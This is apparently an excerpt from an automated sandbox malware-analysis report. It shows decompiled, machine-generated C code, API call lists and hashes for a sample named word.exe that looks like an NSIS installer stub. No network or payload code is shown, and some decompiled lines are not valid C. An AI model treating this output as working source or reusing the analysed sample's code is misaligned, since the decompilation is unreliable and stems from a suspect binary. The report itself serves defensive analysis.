                                                          													 *(__ebp - 0x54) = __esi;
                                                          													__ax =  *__esi;
                                                          													__ecx = __ax & 0x0000ffff;
                                                          													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                          													__eflags =  *(__ebp - 0xc) - __edx;
                                                          													if( *(__ebp - 0xc) >= __edx) {
                                                          														__ecx = 0;
                                                          														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                          														__ecx = 1;
                                                          														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                          														__ebx = 1;
                                                          														__ecx =  *(__ebp - 0x48);
                                                          														__ebx = 1 << __cl;
                                                          														__ecx = 1 << __cl;
                                                          														__ebx =  *(__ebp - 0x44);
                                                          														__ebx =  *(__ebp - 0x44) | __ecx;
                                                          														__cx = __ax;
                                                          														__cx = __ax >> 5;
                                                          														__eax = __eax - __ecx;
                                                          														__edi = __edi + 1;
                                                          														__eflags = __edi;
                                                          														 *(__ebp - 0x44) = __ebx;
                                                          														 *__esi = __ax;
                                                          														 *(__ebp - 0x50) = __edi;
                                                          													} else {
                                                          														 *(__ebp - 0x10) = __edx;
                                                          														0x800 = 0x800 - __ecx;
                                                          														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                          														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                          														 *__esi = __dx;
                                                          													}
                                                          													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          													if( *(__ebp - 0x10) >= 0x1000000) {
                                                          														L111:
                                                          														_t368 = __ebp - 0x48;
                                                          														 *_t368 =  *(__ebp - 0x48) + 1;
                                                          														__eflags =  *_t368;
                                                          														goto L112;
                                                          													} else {
                                                          														goto L109;
                                                          													}
                                                          												}
                                                          												__ecx =  *(__ebp - 0xc);
                                                          												__ebx = __ebx + __ebx;
                                                          												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          												 *(__ebp - 0x44) = __ebx;
                                                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                          													__ecx =  *(__ebp - 0x10);
                                                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                          													__ebx = __ebx | 0x00000001;
                                                          													__eflags = __ebx;
                                                          													 *(__ebp - 0x44) = __ebx;
                                                          												}
                                                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                          												if( *(__ebp - 0x10) >= 0x1000000) {
                                                          													L101:
                                                          													_t338 = __ebp - 0x48;
                                                          													 *_t338 =  *(__ebp - 0x48) - 1;
                                                          													__eflags =  *_t338;
                                                          													goto L102;
                                                          												} else {
                                                          													goto L99;
                                                          												}
                                                          											}
                                                          											__edx =  *(__ebp - 4);
                                                          											__eax = __eax - __ebx;
                                                          											 *(__ebp - 0x40) = __ecx;
                                                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                          											goto L108;
                                                          										case 0x1a:
                                                          											L56:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												 *(__ebp - 0x88) = 0x1a;
                                                          												goto L170;
                                                          											}
                                                          											__ecx =  *(__ebp - 0x68);
                                                          											__al =  *(__ebp - 0x5c);
                                                          											__edx =  *(__ebp - 8);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          											 *( *(__ebp - 0x68)) = __al;
                                                          											__ecx =  *(__ebp - 0x14);
                                                          											 *(__ecx +  *(__ebp - 8)) = __al;
                                                          											__eax = __ecx + 1;
                                                          											__edx = 0;
                                                          											_t192 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t192;
                                                          											goto L79;
                                                          										case 0x1b:
                                                          											L75:
                                                          											__eflags =  *(__ebp - 0x64);
                                                          											if( *(__ebp - 0x64) == 0) {
                                                          												 *(__ebp - 0x88) = 0x1b;
                                                          												goto L170;
                                                          											}
                                                          											__eax =  *(__ebp - 0x14);
                                                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          											__eflags = __eax -  *(__ebp - 0x74);
                                                          											if(__eax >=  *(__ebp - 0x74)) {
                                                          												__eax = __eax +  *(__ebp - 0x74);
                                                          												__eflags = __eax;
                                                          											}
                                                          											__edx =  *(__ebp - 8);
                                                          											__cl =  *(__eax + __edx);
                                                          											__eax =  *(__ebp - 0x14);
                                                          											 *(__ebp - 0x5c) = __cl;
                                                          											 *(__eax + __edx) = __cl;
                                                          											__eax = __eax + 1;
                                                          											__edx = 0;
                                                          											_t274 = __eax %  *(__ebp - 0x74);
                                                          											__eax = __eax /  *(__ebp - 0x74);
                                                          											__edx = _t274;
                                                          											__eax =  *(__ebp - 0x68);
                                                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          											_t283 = __ebp - 0x64;
                                                          											 *_t283 =  *(__ebp - 0x64) - 1;
                                                          											__eflags =  *_t283;
                                                          											 *( *(__ebp - 0x68)) = __cl;
                                                          											L79:
                                                          											 *(__ebp - 0x14) = __edx;
                                                          											goto L80;
                                                          										case 0x1c:
                                                          											while(1) {
                                                          												L123:
                                                          												__eflags =  *(__ebp - 0x64);
                                                          												if( *(__ebp - 0x64) == 0) {
                                                          													break;
                                                          												}
                                                          												__eax =  *(__ebp - 0x14);
                                                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                          												__eflags = __eax -  *(__ebp - 0x74);
                                                          												if(__eax >=  *(__ebp - 0x74)) {
                                                          													__eax = __eax +  *(__ebp - 0x74);
                                                          													__eflags = __eax;
                                                          												}
                                                          												__edx =  *(__ebp - 8);
                                                          												__cl =  *(__eax + __edx);
                                                          												__eax =  *(__ebp - 0x14);
                                                          												 *(__ebp - 0x5c) = __cl;
                                                          												 *(__eax + __edx) = __cl;
                                                          												__eax = __eax + 1;
                                                          												__edx = 0;
                                                          												_t414 = __eax %  *(__ebp - 0x74);
                                                          												__eax = __eax /  *(__ebp - 0x74);
                                                          												__edx = _t414;
                                                          												__eax =  *(__ebp - 0x68);
                                                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                          												__eflags =  *(__ebp - 0x30);
                                                          												 *( *(__ebp - 0x68)) = __cl;
                                                          												 *(__ebp - 0x14) = _t414;
                                                          												if( *(__ebp - 0x30) > 0) {
                                                          													continue;
                                                          												} else {
                                                          													L80:
                                                          													 *(__ebp - 0x88) = 2;
                                                          													goto L1;
                                                          												}
                                                          											}
                                                          											 *(__ebp - 0x88) = 0x1c;
                                                          											goto L170;
                                                          									}
                                                          								}
                                                          								L171:
                                                          								_t535 = _t534 | 0xffffffff;
                                                          								goto L172;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          			}













                                                          0x00406205
                                                          0x00406208
                                                          0x0040620b
                                                          0x0040620e
                                                          0x00406211
                                                          0x00406214
                                                          0x00406217
                                                          0x0040621a
                                                          0x0040621d
                                                          0x00406220
                                                          0x00406238
                                                          0x0040623b
                                                          0x0040623e
                                                          0x00406241
                                                          0x00406241
                                                          0x00406244
                                                          0x00406248
                                                          0x0040624a
                                                          0x00406222
                                                          0x00406222
                                                          0x0040622a
                                                          0x0040622f
                                                          0x00406231
                                                          0x00406233
                                                          0x00406233
                                                          0x0040624d
                                                          0x00406254
                                                          0x00406257
                                                          0x00000000
                                                          0x00406259
                                                          0x00000000
                                                          0x00406259
                                                          0x00406257
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x0040625e
                                                          0x00000000
                                                          0x00000000
                                                          0x00406299
                                                          0x00406299
                                                          0x0040629d
                                                          0x004068a5
                                                          0x00000000
                                                          0x004068a5
                                                          0x004062a3
                                                          0x004062a6
                                                          0x004062a9
                                                          0x004062ad
                                                          0x004062b0
                                                          0x004062b6
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062b8
                                                          0x004062bb
                                                          0x004062be
                                                          0x004062be
                                                          0x004062c4
                                                          0x00406262
                                                          0x00406262
                                                          0x00406265
                                                          0x00000000
                                                          0x00406265
                                                          0x004062c6
                                                          0x004062c6
                                                          0x004062c9
                                                          0x004062cc
                                                          0x004062cf
                                                          0x004062d2
                                                          0x004062d5
                                                          0x004062d8
                                                          0x004062db
                                                          0x004062de
                                                          0x004062e1
                                                          0x004062e4
                                                          0x004062fc
                                                          0x004062ff
                                                          0x00406302
                                                          0x00406305
                                                          0x00406305
                                                          0x00406308
                                                          0x0040630c
                                                          0x0040630e
                                                          0x004062e6
                                                          0x004062e6
                                                          0x004062ee
                                                          0x004062f3
                                                          0x004062f5
                                                          0x004062f7
                                                          0x004062f7
                                                          0x00406311
                                                          0x00406318
                                                          0x0040631b
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x0040631d
                                                          0x00000000
                                                          0x004065aa
                                                          0x004065aa
                                                          0x004065ae
                                                          0x004068d5
                                                          0x00000000
                                                          0x004068d5
                                                          0x004065b4
                                                          0x004065b7
                                                          0x004065ba
                                                          0x004065be
                                                          0x004065c1
                                                          0x004065c7
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065c9
                                                          0x004065cc
                                                          0x00000000
                                                          0x00000000
                                                          0x0040637a
                                                          0x0040637a
                                                          0x0040637d
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066b9
                                                          0x004066bd
                                                          0x004066df
                                                          0x004066e2
                                                          0x004066ec
                                                          0x004066ef
                                                          0x004066ef
                                                          0x00000000
                                                          0x004066ef
                                                          0x004066ef
                                                          0x004066bf
                                                          0x004066c2
                                                          0x004066c6
                                                          0x004066c9
                                                          0x004066c9
                                                          0x004066cc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406776
                                                          0x0040677a
                                                          0x00406798
                                                          0x00406798
                                                          0x00406798
                                                          0x0040679f
                                                          0x004067a6
                                                          0x004067ad
                                                          0x004067ad
                                                          0x00000000
                                                          0x004067ad
                                                          0x0040677c
                                                          0x0040677f
                                                          0x00406782
                                                          0x00406785
                                                          0x0040678c
                                                          0x004066d0
                                                          0x004066d0
                                                          0x004066d3
                                                          0x00000000
                                                          0x00000000
                                                          0x00406867
                                                          0x0040686a
                                                          0x0040676b
                                                          0x00000000
                                                          0x00000000
                                                          0x004064a1
                                                          0x004064a3
                                                          0x004064aa
                                                          0x004064ab
                                                          0x004064ad
                                                          0x004064b0
                                                          0x00000000
                                                          0x00000000
                                                          0x004064b8
                                                          0x004064bb
                                                          0x004064be
                                                          0x004064c0
                                                          0x004064c2
                                                          0x004064c2
                                                          0x004064c3
                                                          0x004064c6
                                                          0x004064cd
                                                          0x004064d0
                                                          0x004064de
                                                          0x00000000
                                                          0x00000000
                                                          0x004067b4
                                                          0x004067b4
                                                          0x004067b7
                                                          0x004067be
                                                          0x00000000
                                                          0x00000000
                                                          0x004067c3
                                                          0x004067c3
                                                          0x004067c7
                                                          0x004068ff
                                                          0x00000000
                                                          0x004068ff
                                                          0x004067cd
                                                          0x004067d0
                                                          0x004067d3
                                                          0x004067d7
                                                          0x004067da
                                                          0x004067e0
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e2
                                                          0x004067e5
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067e8
                                                          0x004067eb
                                                          0x004067eb
                                                          0x004067ef
                                                          0x0040684f
                                                          0x00406852
                                                          0x00406857
                                                          0x00406858
                                                          0x0040685a
                                                          0x0040685c
                                                          0x0040685f
                                                          0x0040676b
                                                          0x0040676b
                                                          0x00000000
                                                          0x00406771
                                                          0x0040676b
                                                          0x004067f1
                                                          0x004067f7
                                                          0x004067fa
                                                          0x004067fd
                                                          0x00406800
                                                          0x00406803
                                                          0x00406806
                                                          0x00406809
                                                          0x0040680c
                                                          0x0040680f
                                                          0x00406812
                                                          0x0040682b
                                                          0x0040682e
                                                          0x00406831
                                                          0x00406834
                                                          0x00406838
                                                          0x0040683a
                                                          0x0040683a
                                                          0x0040683b
                                                          0x0040683e
                                                          0x00406814
                                                          0x00406814
                                                          0x0040681c
                                                          0x00406821
                                                          0x00406823
                                                          0x00406826
                                                          0x00406826
                                                          0x00406841
                                                          0x00406848
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x0040684a
                                                          0x00000000
                                                          0x004064e6
                                                          0x004064e9
                                                          0x0040651f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x0040664f
                                                          0x00406652
                                                          0x00406652
                                                          0x00406655
                                                          0x00406657
                                                          0x004068e1
                                                          0x00000000
                                                          0x004068e1
                                                          0x0040665d
                                                          0x00406660
                                                          0x00000000
                                                          0x00000000
                                                          0x00406666
                                                          0x0040666a
                                                          0x0040666d
                                                          0x0040666d
                                                          0x0040666d
                                                          0x00000000
                                                          0x0040666d
                                                          0x004064eb
                                                          0x004064ed
                                                          0x004064ef
                                                          0x004064f1
                                                          0x004064f4
                                                          0x004064f5
                                                          0x004064f7
                                                          0x004064f9
                                                          0x004064fc
                                                          0x004064ff
                                                          0x00406515
                                                          0x0040651a
                                                          0x00406552
                                                          0x00406552
                                                          0x00406556
                                                          0x00406582
                                                          0x00406584
                                                          0x0040658b
                                                          0x0040658e
                                                          0x00406591
                                                          0x00406591
                                                          0x00406596
                                                          0x00406596
                                                          0x00406598
                                                          0x0040659b
                                                          0x004065a2
                                                          0x004065a5
                                                          0x004065d2
                                                          0x004065d2
                                                          0x004065d5
                                                          0x004065d8
                                                          0x0040664c
                                                          0x0040664c
                                                          0x0040664c
                                                          0x00000000
                                                          0x0040664c
                                                          0x004065da
                                                          0x004065e0
                                                          0x004065e3
                                                          0x004065e6
                                                          0x004065e9
                                                          0x004065ec
                                                          0x004065ef
                                                          0x004065f2
                                                          0x004065f5
                                                          0x004065f8
                                                          0x004065fb
                                                          0x00406614
                                                          0x00406616
                                                          0x00406619
                                                          0x0040661a
                                                          0x0040661d
                                                          0x0040661f
                                                          0x00406622
                                                          0x00406624
                                                          0x00406626
                                                          0x00406629
                                                          0x0040662b
                                                          0x0040662e
                                                          0x00406632
                                                          0x00406634
                                                          0x00406634
                                                          0x00406635
                                                          0x00406638
                                                          0x0040663b
                                                          0x004065fd
                                                          0x004065fd
                                                          0x00406605
                                                          0x0040660a
                                                          0x0040660c
                                                          0x0040660f
                                                          0x0040660f
                                                          0x0040663e
                                                          0x00406645
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x004065cf
                                                          0x00000000
                                                          0x00406647
                                                          0x00000000
                                                          0x00406647
                                                          0x00406645
                                                          0x00406558
                                                          0x0040655b
                                                          0x0040655d
                                                          0x00406560
                                                          0x00406563
                                                          0x00406566
                                                          0x00406568
                                                          0x0040656b
                                                          0x0040656e
                                                          0x0040656e
                                                          0x00406571
                                                          0x00406571
                                                          0x00406574
                                                          0x0040657b
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x0040654f
                                                          0x00000000
                                                          0x0040657d
                                                          0x00000000
                                                          0x0040657d
                                                          0x0040657b
                                                          0x00406501
                                                          0x00406504
                                                          0x00406506
                                                          0x00406509
                                                          0x00000000
                                                          0x00000000
                                                          0x00406268
                                                          0x00406268
                                                          0x0040626c
                                                          0x004068b1
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
                                                          • Instruction ID: eed9497ed027258a65708919b4ea66700c8fb804c6c24b7440c20fb41b46c6b0
                                                          • Opcode Fuzzy Hash: 777e71cebdbf5760ca8733070a207fa71ebe7e60942d27e02112710a77df43e6
                                                          • Instruction Fuzzy Hash: 57715671D00229CFEF28CF98C844BADBBB1FB44305F15806AD856BB281D7789A96DF44
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 82%
                                                          			E00401E76() {
                                                          				void* _t15;
                                                          				void* _t24;
                                                          				void* _t26;
                                                          				void* _t31;
                                                          
                                                          				_t28 = E00402A85(_t24);
                                                          				E00404E9F(0xffffffeb, _t13);
                                                          				_t15 = E00405361(_t28); // executed
                                                          				 *(_t31 + 8) = _t15;
                                                          				if(_t15 == _t24) {
                                                          					 *((intOrPtr*)(_t31 - 4)) = 1;
                                                          				} else {
                                                          					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                                                          						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                                                          							E00405E13(0xf);
                                                          						}
                                                          						GetExitCodeProcess( *(_t31 + 8), _t31 - 0x3c); // executed
                                                          						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                                                          							if( *(_t31 - 0x3c) != _t24) {
                                                          								 *((intOrPtr*)(_t31 - 4)) = 1;
                                                          							}
                                                          						} else {
                                                          							E00405A52(_t26,  *(_t31 - 0x3c));
                                                          						}
                                                          					}
                                                          					_push( *(_t31 + 8));
                                                          					CloseHandle();
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t31 - 4));
                                                          				return 0;
                                                          			}








                                                          APIs
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                                                            • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                                                            • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                                                            • Part of subcall function 00405361: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422538,Error launching installer), ref: 00405386
                                                            • Part of subcall function 00405361: CloseHandle.KERNEL32(?), ref: 00405393
                                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401EB0
                                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401EC0
                                                          • CloseHandle.KERNEL32(?), ref: 00401EE5
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3521207402-0
                                                          • Opcode ID: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
                                                          • Instruction ID: 7da7f48acba4dd0e4cefddd12cfcc923695080b3e0b12fbb56f2b87fe8ee5a54
                                                          • Opcode Fuzzy Hash: 63ea715109260620e1cc643b3b38af3e1470e562ac9841a4740e8934b88e8816
                                                          • Instruction Fuzzy Hash: D9012D31D04105EBCB21AFA5DD85A9E7AB5EF40344F14803BFA05B61E1C7BD4A41DF9A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00403664() {
                                                          				void* _t1;
                                                          				void* _t2;
                                                          				void* _t3;
                                                          				void* _t6;
                                                          				signed int _t11;
                                                          
                                                          				_t1 =  *0x409020; // 0xffffffff
                                                          				if(_t1 != 0xffffffff) {
                                                          					CloseHandle(_t1); // executed
                                                          					 *0x409020 =  *0x409020 | 0xffffffff;
                                                          				}
                                                          				_t2 =  *0x409024; // 0xffffffff
                                                          				if(_t2 != 0xffffffff) {
                                                          					CloseHandle(_t2);
                                                          					 *0x409024 =  *0x409024 | 0xffffffff;
                                                          					_t11 =  *0x409024;
                                                          				}
                                                          				_t3 = E00405426(_t6, _t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nseBFFE.tmp\\", 7); // executed
                                                          				return _t3;
                                                          			}









                                                          APIs
                                                          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 00403676
                                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 0040368A
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\, xrefs: 00403695
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CloseHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nseBFFE.tmp\
                                                          • API String ID: 2962429428-4221711395
                                                          • Opcode ID: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
                                                          • Instruction ID: 388c8ae895ed4ea73890f6290ee17e3c52ce59555f833da3370ec015b8cfd073
                                                          • Opcode Fuzzy Hash: 16c7fddc27a42458c1d873a3e0a24777e1257085425b1f33580ea887bd94cc5b
                                                          • Instruction Fuzzy Hash: CCE01235D0472066C628AB7CFE49E553B69AB053357640726F238F62F1C7789C428A5C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040327D(void* _a4, long _a8) {
                                                          				int _t6;
                                                          				long _t10;
                                                          
                                                          				_t10 = _a8;
                                                          				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
                                                          				if(_t6 == 0 || _a8 != _t10) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}






                                                          APIs
                                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,tCPInfo), ref: 00403294
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: tCPInfo
                                                          • API String ID: 2738559852-2120998202
                                                          • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                          • Instruction ID: fb6a36c91f62b4f1fc6c0be421fc724d0e407ee9a1d4d48bf35ddf6d218f7e68
                                                          • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                          • Instruction Fuzzy Hash: FAE08C32510219BBCF105E519C00EA73F6CEB093A2F008036F904E5190D238EA10DBA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 69%
                                                          			E00401389(signed int _a4, struct HWND__* _a11) {
                                                          				intOrPtr* _t6;
                                                          				void* _t8;
                                                          				void* _t10;
                                                          				signed int _t11;
                                                          				void* _t12;
                                                          				signed int _t16;
                                                          				signed int _t17;
                                                          
                                                          				_t17 = _a4;
                                                          				while(_t17 >= 0) {
                                                          					_t6 = _t17 * 0x1c +  *0x423f50;
                                                          					if( *_t6 == 1) {
                                                          						break;
                                                          					}
                                                          					_push(_t6); // executed
                                                          					_t8 = E00401434(); // executed
                                                          					if(_t8 == 0x7fffffff) {
                                                          						return 0x7fffffff;
                                                          					}
                                                          					_t10 = E0040136D(_t8);
                                                          					if(_t10 != 0) {
                                                          						_t11 = _t10 - 1;
                                                          						_t16 = _t17;
                                                          						_t17 = _t11;
                                                          						_t12 = _t11 - _t16;
                                                          					} else {
                                                          						_t12 = _t10 + 1;
                                                          						_t17 = _t17 + 1;
                                                          					}
                                                          					if(_a11 != 0) {
                                                          						 *0x42370c =  *0x42370c + _t12;
                                                          						SendMessageA(_a11, 0x402, MulDiv( *0x42370c, 0x7530,  *0x4236f4), 0);
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}











                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
                                                          • Instruction ID: 84a05c9b45cf4c5fa881fbb5f17894f913db592f6cd276ec9e0bf70eb6e0573e
                                                          • Opcode Fuzzy Hash: e415eab16c23440566152ba8713208aa0499868cfc73bd855f0a913c78e047d0
                                                          • Instruction Fuzzy Hash: 1E01F471B242119BE7294F789D05B2A36A8E710325F10823BFA55F66F1D67CDC028B4D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 68%
                                                          			E004057CB(CHAR* _a4, long _a8, long _a12) {
                                                          				signed int _t5;
                                                          				void* _t6;
                                                          
                                                          				_t5 = GetFileAttributesA(_a4); // executed
                                                          				asm("sbb ecx, ecx");
                                                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                          				return _t6;
                                                          			}






                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 004057CF
